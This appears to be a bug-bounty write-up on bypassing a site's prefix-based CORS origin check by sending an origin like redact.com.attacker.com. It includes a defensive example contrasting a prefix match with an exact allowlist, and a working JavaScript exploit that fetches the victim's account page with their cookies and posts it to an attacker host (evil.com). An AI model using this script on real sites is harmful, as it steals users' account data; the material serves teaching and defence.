Hello friends, this write-up is about how I bypassed a website's CORS origin validation. Let's call the site redact.com. After logging in I checked the account pages for CSRF, but the sensitive request carried a Current Password parameter, so even if I could get around the CSRF protection I would still need the victim's current password to exploit it.

Then I noticed these two response headers:

Access-Control-Allow-Origin: https://redact.com

Access-Control-Allow-Credentials: true

I tried setting the Origin header to https://attacker.com, but it didn't work. Adding a second Origin header failed as well. So the server was validating the Origin value, but as it turned out, only loosely. Note that the second header above, Access-Control-Allow-Credentials: true, is what makes a reflected origin dangerous: the browser will send the victim's cookies with the request and let the page on that origin read the response.


The check only looks at the start of the Origin value, so we can trick it by setting the Origin header to https://redact.com.attacker.com. The server sees redact.com at the beginning, accepts it, and reflects the whole attacker-controlled origin in Access-Control-Allow-Origin.
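As an added illustration (my own example, not code from the post or from redact.com, whose real check is only visible in the screenshots), here is the kind of prefix match this bypass implies, next to an exact allowlist comparison that does not reflect crafted origins. The one assumption is that the server compared the start of the Origin value, which is what accepting redact.com.attacker.com indicates; the probe origins are constructed for the demo.

```javascript
// Added example: a loose (prefix) Origin check versus an exact allowlist check,
// and the CORS headers each would return. Not the post's or the target's code;
// the prefix match is assumed from the fact that redact.com.attacker.com passed.

const TRUSTED_ORIGIN = "https://redact.com";

// Vulnerable: anything that begins with the trusted origin is accepted, so
// "https://redact.com.attacker.com" (and "https://redact.comevil.net") get through.
function originAllowedVulnerable(origin) {
  return typeof origin === "string" && origin.startsWith(TRUSTED_ORIGIN);
}

// Hardened: the whole origin (scheme + host + optional port) must be in the allowlist.
const ALLOWED_ORIGINS = new Set([TRUSTED_ORIGIN]);
function originAllowedFixed(origin) {
  return ALLOWED_ORIGINS.has(origin);
}

// Headers a server would send for a request carrying `origin`, given a check function.
// A rejected origin gets no Access-Control-* headers at all, which is the safe default.
function corsHeadersFor(origin, isAllowed) {
  if (!isAllowed(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,      // reflected, not a wildcard
    "Access-Control-Allow-Credentials": "true", // cookies are sent, response is readable
    "Vary": "Origin",                           // keep caches from mixing origins
  };
}

// Constructed probe origins, in the order the post tried them, plus one variant.
const PROBES = [
  "https://redact.com",              // legitimate origin
  "https://attacker.com",            // plain attacker origin: rejected by both checks
  "https://redact.com.attacker.com", // the bypass from the post
  "https://redact.comevil.net",      // same trick without the dot (constructed)
];

// For each probe, report which origin (if any) would land in Access-Control-Allow-Origin.
function probeOrigins(isAllowed) {
  const result = {};
  for (const o of PROBES) {
    result[o] = corsHeadersFor(o, isAllowed)["Access-Control-Allow-Origin"] || null;
  }
  return result;
}

console.log("vulnerable check:", probeOrigins(originAllowedVulnerable));
console.log("fixed check:    ", probeOrigins(originAllowedFixed));
```

Running it prints the reflected origin for the two crafted values under the prefix check and null for them under the allowlist check. If you need to allow subdomains, build the allowlist from full origins rather than matching on a substring of the host.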


I tried this against redact.com and it worked: the crafted origin came back in Access-Control-Allow-Origin.


Next, I loaded the Account-Detail page from the evil origin to steal the information.


A fetch request sent with credentials from the evil page pulls the account information page with the victim's cookies attached, and the page then displays the stolen content on evil.com.
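For the exfiltration step, here is an added example (my own, not the author's PoC) of the script the attacker page would run. It takes the fetch implementation as a parameter so the flow can be exercised with a stub outside a browser; in a real page you pass window.fetch. The target path /account-details and the collector URL on evil.com are placeholders I made up, and the attacker page itself must be served from the origin the server reflects (for example https://redact.com.attacker.com), otherwise the browser blocks the read.

```javascript
// Added example, not the original post's PoC. Runs in the attacker's page, which
// must be hosted on the origin the vulnerable server reflects (assumed here to be
// https://redact.com.attacker.com). URLs below are hypothetical placeholders.

const TARGET_URL = "https://redact.com/account-details"; // assumed path on the target
const EXFIL_URL = "https://evil.com/collect";            // assumed attacker collector

// Fetch the victim's account page with their cookies attached and ship it to the attacker.
// `fetchImpl` is injected so the flow can run without a browser; pass window.fetch in one.
async function stealAccountDetails(fetchImpl = globalThis.fetch, targetUrl = TARGET_URL, exfilUrl = EXFIL_URL) {
  // credentials: "include" tells the browser to send redact.com's cookies on this
  // cross-origin request. The body is only readable here because the server answers with
  // Access-Control-Allow-Origin: <this page's origin> and Access-Control-Allow-Credentials: true.
  const res = await fetchImpl(targetUrl, { method: "GET", credentials: "include" });
  if (!res.ok) throw new Error(`target returned HTTP ${res.status}`);
  const stolen = await res.text();

  // Send it to the attacker's server. mode: "no-cors" avoids a preflight, so the
  // collector needs no CORS headers; the attacker never needs to read this response.
  await fetchImpl(exfilUrl, { method: "POST", mode: "no-cors", body: stolen });
  return stolen;
}

// Pre-check: would the browser expose a response with these headers to a page at `pageOrigin`?
// Mirrors the CORS rules for credentialed requests: "*" is not accepted, the origin must match exactly,
// and Access-Control-Allow-Credentials must be the literal string "true".
function browserExposesResponse(pageOrigin, responseHeaders) {
  const acao = responseHeaders["Access-Control-Allow-Origin"];
  const acac = responseHeaders["Access-Control-Allow-Credentials"];
  return acao === pageOrigin && acac === "true";
}

// Show the stolen page on the attacker site, as the post's screenshots did. Uses textContent
// inside a <pre> so the stolen markup is displayed rather than executed in the attacker page.
// Returns false when there is no DOM (e.g. when exercised under Node).
function displayStolenPage(html, doc = globalThis.document) {
  if (!doc) return false;
  const pre = doc.createElement("pre");
  pre.textContent = html;
  doc.body.appendChild(pre);
  return true;
}
```

In the browser you would call `stealAccountDetails().then(displayStolenPage)` from the attacker page. If the victim's session cookie is marked SameSite=Lax or Strict, the browser will not attach it to this cross-site fetch and the attack yields only the logged-out page, so check the cookie attributes before assuming the reflected origin is exploitable.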

Boom, data stolen. I hope you guys liked it.

./LOGOUT
